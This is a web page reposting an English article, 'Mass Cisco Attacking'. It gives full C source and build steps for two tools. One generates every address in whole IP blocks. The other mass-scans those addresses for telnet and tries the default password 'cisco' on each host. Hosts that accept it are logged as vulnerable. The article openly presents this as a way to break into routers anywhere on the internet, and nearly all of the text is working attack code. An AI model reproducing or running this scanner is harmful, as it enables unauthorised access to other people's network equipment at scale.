Mass Cisco Attacking

更新时间：2022-08-23 10:00:48
Mass Cisco Attacking
-------------------------

This article explain you how to attack cisco router using password guessing, 
By default telnet password in cisco is "cisco", Using this knowledge i create 
cisco mass scanner to guess telnet password on any router on the net!

gcc -o ipcombine ipcombine.c
gcc -o mass mass.c -lpthread
./ipcombine xxx xxx
./mass

======================= ipcombine.c =======================

#include <stdio.h>

/*
 *IP combiner code By Ph03n1X
 *http://kandangjamur.net || king_purba@yahoo.co.uk
*/

int main(int argc,char *argv[])
{
  FILE *fp;
  int bloka,blokb,blokc;
  int x,y,z;
  char IP[32];

  if(argc<2 || argc>4)
  {
    printf("Usage : %s <BLOK 1> <BLOK 2> <BLOK 3>/n",argv[0]);
    exit(0);
  }
  fp=fopen("server.txt","a");
  if(fp==NULL)
  {
    printf("Cannot create file/n");
    exit(0);
  }
  
  if(argc==2)
  {
    bloka=atoi(argv[1]);
    for(x=0;x<=255;x++){
      for(y=0;y<=255;y++){
        for(z=1;z<=254;z++){
	  snprintf(IP,sizeof(IP),"%d.%d.%d.%d",bloka,x,y,z);
          fprintf(fp,"%s/n",IP);
	}
      }
    }
    fclose(fp);
  }
  else if(argc==3){
    bloka=atoi(argv[1]);
    blokb=atoi(argv[2]);
    for(y=0;y<=255;y++){
      for(z=1;z<=254;z++){
        snprintf(IP,sizeof(IP),"%d.%d.%d.%d",bloka,blokb,y,z);
        fprintf(fp,"%s/n",IP);
      }
    }
  fclose(fp);
  }
  else if(argc==4){
    bloka=atoi(argv[1]);
    blokb=atoi(argv[2]);
    blokc=atoi(argv[3]);
      for(z=1;z<=254;z++){
         snprintf(IP,sizeof(IP),"%d.%d.%d.%d",bloka,blokb,blokc,z);
         fprintf(fp,"%s/n",IP);
      }
   }
}


======================== mass.c =========================

/*

Mass cisco scanner code By Ph03n1X
http://kandangjamur.net || king_purba@yahoo.co.uk

Mass Cisco scanner
Compile : gcc -o mass mass.c -lpthread
Usage :

1. Execute ipcombine first, ex : ./ipcombine 222 124
2. Execute mass, ex : ./mass

Reference :
1. http://www.securityfocus.com/tools/817
3. http://www.phenoelit.de/dpl/dpl.html

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <fcntl.h>
#include <netdb.h>
#include <signal.h>
#include <errno.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define PORT 23
#define TIMEOUT 3
#define CHILDREN 250
#define SIZE 1024

int scan_tcp(char *ip, int port);
int ctimeout(int sf, struct sockaddr *alamat,socklen_t len,int tout);
long hosts_scanned = 0;

int main(int argc, char **argv)
{
  int i = 0;
  FILE *fp;
  char IP[32];
  int status;

if((fp=fopen("server.txt","r"))==NULL)
{
   printf("File Not Found/n");
   exit(1);
}
  
while((fgets(IP,sizeof(IP),fp)) != NULL)
{
    hosts_scanned++;
    i++;
    IP[strlen(IP) - 1] = '/0';

      switch (fork())
      {
	case 0:
	{
	  scan_tcp(IP,PORT);
	  _exit(0);
	  break;
	}
	case -1:
	{
	  printf("fork error/n");
	  _exit(0);
	  break;
	}
	default:
	{
	  if(i > CHILDREN - 2)
	  {
	    wait(&status);
	    i--;
	  }
	  break;
	}
      }

    bzero(IP, sizeof(IP));
 }
 printf("Hosts being scanned: %ld/n", hosts_scanned);
 fclose(fp);
 return 0;
}

int ctimeout(int sf, struct sockaddr *alamat,socklen_t len,int tout)
{
	int res,slen,flags;
	struct timeval tv;
	struct sockaddr_in almt;
	fd_set rdf,wrf;

	fcntl(sf,F_SETFL,O_NONBLOCK);
	res = connect(sf,alamat,len);
	if (res>=0)return res;

	FD_ZERO(&rdf);
	FD_ZERO(&wrf);
	FD_SET(sf, &rdf);
	FD_SET(sf, &wrf);
	bzero(&tv, sizeof(tv));
	tv.tv_sec = tout;

	if (select(sf + 1, &rdf, &wrf, 0, &tv) <= 0)
		return -1;
	if (FD_ISSET(sf, &wrf) || FD_ISSET(sf, &rdf)) {
		slen = sizeof(almt);
		if (getpeername(sf, (struct sockaddr*)&almt, &slen) == -1)
			return -1;
		flags = fcntl(sf, F_GETFL, NULL);
		fcntl(sf, F_SETFL, flags & ~O_NONBLOCK);
		return 0;
	}
	return -1;
}

scan_tcp(char *target,int port)
{
	FILE *ff;
	int s,conn,len1,len2,len3;
	struct sockaddr_in almt_ser;
	struct hostent *he;
	char servbuf1[SIZE],servbuf2[SIZE];
	char pass[12];

	ff=fopen("vulnerserver.txt","a");
        if(ff==NULL)
        {
                printf("File Not Found/n");
                exit(1);
        }

	if((he=gethostbyname(target))==NULL)
	{
		printf("Host target tidak ditemukan/n");
		exit(0);
	}
	if((s=socket(AF_INET,SOCK_STREAM,0))<0)
	{
		printf("Cannot create socket/n");
		exit(0);
	}
	
	bzero((char *) &almt_ser, sizeof(almt_ser));
	almt_ser.sin_family = AF_INET;
	bcopy( (char *)he->h_addr,(char *)&almt_ser.sin_addr.s_addr,he->h_length);
	almt_ser.sin_port = htons(port);

	if((ctimeout(s,(struct sockaddr*)&almt_ser,sizeof(almt_ser),5))==-1)
	{
		printf("[ %s ] Port %d (TCP) tertutup/n",target,port);
	}
	else
	{
		printf("[ %s ] Port %d (TCP) terbuka/n",target,port);
		
		
		memset(servbuf1,'/0',SIZE);
		recv(s,servbuf1,SIZE-1,0);
		
		send(s,"cisco/r",6,0);		
		sleep(1);
	
		memset(servbuf2,'/0',SIZE);
                recv(s,servbuf2,SIZE-1,0);

		if(strstr(servbuf2,">"))
		{
			printf("%s : Password Telnet /"cisco/"/n",target);
                        fprintf(ff,"%s : Password Telnet /"cisco/"/n",target);
                        fclose(ff);
		}else{
			printf("%s : Not Vulner/n",target);                        
                        fclose(ff);
		}
	}
        close(s);
}
上一篇 : ：Windows 2003 安全设置之PHP篇下一篇 : 用cisco配置帧中继交换机同时配置ospf
Mass Cisco Attacking

相关阅读

推荐文章
